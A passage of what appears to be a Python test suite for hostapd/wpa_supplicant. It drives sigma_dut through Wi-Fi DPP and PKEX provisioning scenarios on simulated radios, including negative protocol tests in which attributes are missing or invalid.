id1 = dev.dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d identifier=test code=secret" % (id1)
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to set PKEX data (responder)")
return
def test_sigma_dut_dpp_pkexv2_init_fallback_to_v1(dev, apdev):
"""sigma_dut DPP/PKEXv2 initiator and fallback to v1"""
check_dpp_capab(dev[0], min_ver=3)
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
t = threading.Thread(target=dpp_pkex_resp_start_on_v1, args=(dev[1],))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCodeIdentifier,test,DPPPKEXCode,secret,DPPTimeout,30",
timeout=31)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_pkex_v1_only(dev, apdev):
"""sigma_dut DPP/PKEX as v1 only initiator"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
id1 = dev[1].dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d identifier=test code=secret" % (id1)
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to set PKEX data (responder)")
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEXv1,DPPPKEXCodeIdentifier,test,DPPPKEXCode,secret,DPPTimeout,6")
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_pkex_v1_only_responder(dev, apdev):
"""sigma_dut DPP/PKEX as v1 only responder"""
run_sigma_dut_dpp_pkex_responder(dev, apdev, v1=True)
def test_sigma_dut_dpp_pkex_responder(dev, apdev):
"""sigma_dut DPP/PKEX as responder"""
run_sigma_dut_dpp_pkex_responder(dev, apdev)
def dpp_init_enrollee_pkex(dev):
logger.info("Starting DPP PKEX initiator/enrollee in a thread")
time.sleep(1.5)
id = dev.dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d init=1 role=enrollee identifier=test code=secret" % id
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to initiate DPP PKEX")
ev = dev.wait_event(["DPP-CONF-RECEIVED"], timeout=15)
if ev is None:
raise Exception("DPP configuration not completed (Enrollee)")
logger.info("DPP initiator/enrollee done")
def run_sigma_dut_dpp_pkex_responder(dev, apdev, v1=False):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" %
dev[0].ifname)
t = threading.Thread(target=dpp_init_enrollee_pkex, args=(dev[1],))
t.start()
dppbs = "PKEXv1" if v1 else "PKEX"
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,%s,DPPPKEXCodeIdentifier,test,DPPPKEXCode,secret,DPPTimeout,16" % dppbs, timeout=20)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def dpp_init_conf(dev, id1, conf, conf_id, extra):
logger.info("Starting DPP initiator/configurator in a thread")
cmd = "DPP_AUTH_INIT peer=%d conf=%s %s configurator=%d" % (id1, conf, extra, conf_id)
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP initiator/configurator done")
def test_sigma_dut_ap_dpp_qr(dev, apdev, params):
"""sigma_dut controlled AP (DPP)"""
run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-dpp", "sta-dpp")
def test_sigma_dut_ap_dpp_qr_legacy(dev, apdev, params):
"""sigma_dut controlled AP (legacy)"""
run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-psk", "sta-psk",
extra="pass=%s" % to_hex("qwertyuiop"))
def test_sigma_dut_ap_dpp_qr_legacy_psk(dev, apdev, params):
"""sigma_dut controlled AP (legacy)"""
run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-psk", "sta-psk",
extra="psk=%s" % (32*"12"))
def run_sigma_dut_ap_dpp_qr(dev, apdev, params, ap_conf, sta_conf, extra=""):
check_dpp_capab(dev[0])
logdir = os.path.join(params['logdir'], "sigma_dut_ap_dpp_qr.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,program,DPP")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[0].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id1 = dev[0].dpp_qr_code(uri)
t = threading.Thread(target=dpp_init_conf,
args=(dev[0], id1, ap_conf, conf_id, extra))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6")
t.join()
if "ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
id1 = dev[1].dpp_bootstrap_gen(chan="81/1", mac=True)
uri1 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id1)
id0b = dev[0].dpp_qr_code(uri1)
dev[1].set("dpp_config_processing", "2")
cmd = "DPP_LISTEN 2412"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
cmd = "DPP_AUTH_INIT peer=%d conf=%s %s configurator=%d" % (id0b, sta_conf, extra, conf_id)
if "OK" not in dev[0].request(cmd):
raise Exception("Failed to initiate DPP Authentication")
dev[1].wait_connected(timeout=20)
sigma_dut_cmd_check("ap_reset_default")
finally:
dev[1].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_ap_dpp_offchannel(dev, apdev, params):
"""sigma_dut controlled AP doing DPP on offchannel"""
check_dpp_capab(dev[0])
logdir = params['prefix'] + ".sigma-hostapd"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,program,DPP")
sigma_dut_cmd_check("ap_preset_testparameters,Program,DPP,Oper_Chn,3")
res = sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
if "C:81/3;" not in uri:
raise Exception("Unexpected channel in AP's URI: " + uri)
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[0].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[0].dpp_bootstrap_gen(chan="81/7", mac=True)
uri0 = dev[0].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[0].set("dpp_configurator_params",
"conf=ap-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
dev[0].dpp_listen(2442)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6")
if "ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
id1 = dev[1].dpp_bootstrap_gen(chan="81/1", mac=True)
uri1 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id1)
id0b = dev[0].dpp_qr_code(uri1)
dev[1].set("dpp_config_processing", "2")
cmd = "DPP_LISTEN 2412"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
cmd = "DPP_AUTH_INIT peer=%d conf=sta-dpp ssid=%s configurator=%d" % (id0b, to_hex("DPPNET01"), conf_id)
if "OK" not in dev[0].request(cmd):
raise Exception("Failed to initiate DPP Authentication")
dev[1].wait_connected(timeout=20)
sigma_dut_cmd_check("ap_reset_default")
finally:
dev[1].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_ap_dpp_pkex_responder(dev, apdev, params):
"""sigma_dut controlled AP as DPP PKEX responder"""
check_dpp_capab(dev[0])
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_dpp_pkex_responder.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_dpp_pkex_responder(dev, apdev)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_dpp_pkex_v1_responder(dev, apdev, params):
"""sigma_dut controlled AP as DPP PKEXv1 responder"""
check_dpp_capab(dev[0])
logdir = params['prefix'] + ".sigma-hostapd"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_dpp_pkex_responder(dev, apdev, v1=True)
finally:
stop_sigma_dut(sigma)
def dpp_init_conf_pkex(dev, conf_id, check_config=True):
logger.info("Starting DPP PKEX initiator/configurator in a thread")
time.sleep(1.5)
id = dev.dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d init=1 conf=ap-dpp configurator=%d code=password" % (id, conf_id)
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to initiate DPP PKEX")
if not check_config:
return
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=15)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP initiator/configurator done")
def run_sigma_dut_ap_dpp_pkex_responder(dev, apdev, v1=False):
sigma_dut_cmd_check("ap_reset_default,program,DPP")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[0].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
t = threading.Thread(target=dpp_init_conf_pkex, args=(dev[0], conf_id))
t.start()
dppbs = "PKEXv1" if v1 else "PKEX"
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,%s,DPPPKEXCode,password,DPPTimeout,16,DPPWaitForConnect,No" % dppbs,
timeout=20)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
sigma_dut_cmd_check("ap_reset_default")
def test_sigma_dut_ap_dpp_pkex_responder_tcp(dev, apdev, params):
"""sigma_dut controlled AP as DPP PKEX responder (TCP)"""
check_dpp_capab(dev[0], min_ver=3)
logdir = params['prefix'] + ".sigma-hostapd"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_dpp_pkex_responder_tcp(dev, apdev)
finally:
stop_sigma_dut(sigma)
def dpp_init_conf_pkex_tcp(dev, conf_id, check_config=True):
logger.info("Starting DPP PKEX initiator/configurator in a thread")
time.sleep(1.5)
id = dev.dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d tcp_addr=127.0.0.1 init=1 conf=ap-dpp configurator=%d code=password" % (id, conf_id)
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to initiate DPP PKEX")
if not check_config:
return
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP initiator/configurator done")
def run_sigma_dut_ap_dpp_pkex_responder_tcp(dev, apdev):
sigma_dut_cmd_check("ap_reset_default,program,DPP")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[0].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
t = threading.Thread(target=dpp_init_conf_pkex_tcp, args=(dev[0], conf_id))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPProvisioningRole,Enrollee,DPPBS,PKEX,DPPPKEXCode,password,DPPOverTCP,yes,DPPTimeout,6,DPPWaitForConnect,No", timeout=10)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
sigma_dut_cmd_check("ap_reset_default")
def test_sigma_dut_dpp_pkex_responder_proto(dev, apdev):
"""sigma_dut controlled STA as DPP PKEX responder and error case"""
check_dpp_capab(dev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_pkex_responder_proto(dev, apdev)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_pkex_responder_proto(dev, apdev):
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
dev[1].set("dpp_test", "44")
t = threading.Thread(target=dpp_init_conf_pkex, args=(dev[1], conf_id,
False))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPProvisioningRole,Enrollee,DPPBS,PKEX,DPPPKEXCode,password,DPPTimeout,6", timeout=10)
t.join()
if "BootstrapResult,Timeout" not in res:
raise Exception("Unexpected result: " + res)
def dpp_proto_init(dev, id1):
time.sleep(1)
logger.info("Starting DPP initiator/configurator in a thread")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
cmd = "DPP_AUTH_INIT peer=%d conf=sta-dpp configurator=%d" % (id1, conf_id)
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
def test_sigma_dut_dpp_proto_initiator(dev, apdev):
"""sigma_dut DPP protocol testing - Initiator"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [("InvalidValue", "AuthenticationRequest", "WrappedData",
"BootstrapResult,OK,AuthResult,Errorsent",
None),
("InvalidValue", "AuthenticationConfirm", "WrappedData",
"BootstrapResult,OK,AuthResult,Errorsent",
None),
("MissingAttribute", "AuthenticationRequest", "InitCapabilities",
"BootstrapResult,OK,AuthResult,Errorsent",
"Missing or invalid I-capabilities"),
("InvalidValue", "AuthenticationConfirm", "InitAuthTag",
"BootstrapResult,OK,AuthResult,Errorsent",
"Mismatching Initiator Authenticating Tag"),
("MissingAttribute", "ConfigurationResponse", "EnrolleeNonce",
"BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent",
"Missing or invalid Enrollee Nonce attribute")]
for step, frame, attr, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_initiator(dev, step, frame, attr, result,
fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_initiator(dev, step, frame, attr, result, fail):
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr),
timeout=10)
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly: " + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_responder(dev, apdev):
"""sigma_dut DPP protocol testing - Responder"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [("MissingAttribute", "AuthenticationResponse", "DPPStatus",
"BootstrapResult,OK,AuthResult,Errorsent",
"Missing or invalid required DPP Status attribute"),
("MissingAttribute", "ConfigurationRequest", "EnrolleeNonce",
"BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent",
"Missing or invalid Enrollee Nonce attribute")]
for step, frame, attr, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_responder(dev, step, frame, attr, result,
fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_responder(dev, step, frame, attr, result, fail):
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
t = threading.Thread(target=dpp_proto_init, args=(dev[1], id1))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr), timeout=10)
t.join()
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly:" + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_stop_at_initiator(dev, apdev):
"""sigma_dut DPP protocol testing - Stop at RX on Initiator"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [("AuthenticationResponse",
"BootstrapResult,OK,AuthResult,Errorsent",
None),
("ConfigurationRequest",
"BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent",
None)]
for frame, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_stop_at_initiator(dev, frame, result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_stop_at_initiator(dev, frame, result, fail):
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame))
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly: " + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, apdev):
"""sigma_dut DPP protocol testing - Stop at TX on Initiator/Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [("AuthenticationConfirm",
"BootstrapResult,OK,AuthResult,Errorsent,LastFrameReceived,AuthenticationResponse",
None)]
for frame, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, frame,
result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, frame, result,
fail):
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame), timeout=10)
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly: " + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_stop_at_responder(dev, apdev):
"""sigma_dut DPP protocol testing - Stop at RX on Responder"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [("AuthenticationRequest",
"BootstrapResult,OK,AuthResult,Errorsent",
None),
("AuthenticationConfirm",
"BootstrapResult,OK,AuthResult,Errorsent",
None)]
for frame, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_stop_at_responder(dev, frame, result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_stop_at_responder(dev, frame, result, fail):
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
t = threading.Thread(target=dpp_proto_init, args=(dev[1], id1))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame), timeout=10)
t.join()
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly:" + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def dpp_proto_init_pkex(dev):
time.sleep(1)
logger.info("Starting DPP PKEX initiator/configurator in a thread")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id = dev.dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d init=1 conf=sta-dpp configurator=%d code=secret" % (id, conf_id)
if "FAIL" in dev.request(cmd):
raise Exception("Failed to initiate DPP PKEX")
def test_sigma_dut_dpp_proto_initiator_pkex(dev, apdev):
"""sigma_dut DPP protocol testing - Initiator (PKEX)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [("InvalidValue", "PKEXCRRequest", "WrappedData",
"BootstrapResult,Errorsent",
None),
("MissingAttribute", "PKEXExchangeRequest", "FiniteCyclicGroup",
"BootstrapResult,Errorsent",
"Missing or invalid Finite Cyclic Group attribute"),
("MissingAttribute", "PKEXCRRequest", "BSKey",
"BootstrapResult,Errorsent",
"No valid peer bootstrapping key found")]
for step, frame, attr, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_initiator_pkex(dev, step, frame, attr,
result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_initiator_pkex(dev, step, frame, attr, result, fail):
id1 = dev[1].dpp_bootstrap_gen(type="pkex")
cmd = "DPP_PKEX_ADD own=%d code=secret" % (id1)
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to set PKEX data (responder)")
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCode,secret,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr))
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly: " + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_responder_pkex(dev, apdev):
"""sigma_dut DPP protocol testing - Responder (PKEX)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [("InvalidValue", "PKEXCRResponse", "WrappedData",
"BootstrapResult,Errorsent",
None),
("MissingAttribute", "PKEXExchangeResponse", "DPPStatus",
"BootstrapResult,Errorsent",
"No DPP Status attribute"),
("MissingAttribute", "PKEXCRResponse", "BSKey",
"BootstrapResult,Errorsent",
"No valid peer bootstrapping key found")]
for step, frame, attr, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_responder_pkex(dev, step, frame, attr,
result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_responder_pkex(dev, step, frame, attr, result, fail):
t = threading.Thread(target=dpp_proto_init_pkex, args=(dev[1],))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCode,secret,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr), timeout=10)
t.join()
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly:" + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def init_sigma_dut_dpp_proto_peer_disc_req(dev, apdev):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"),
conf_id))
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
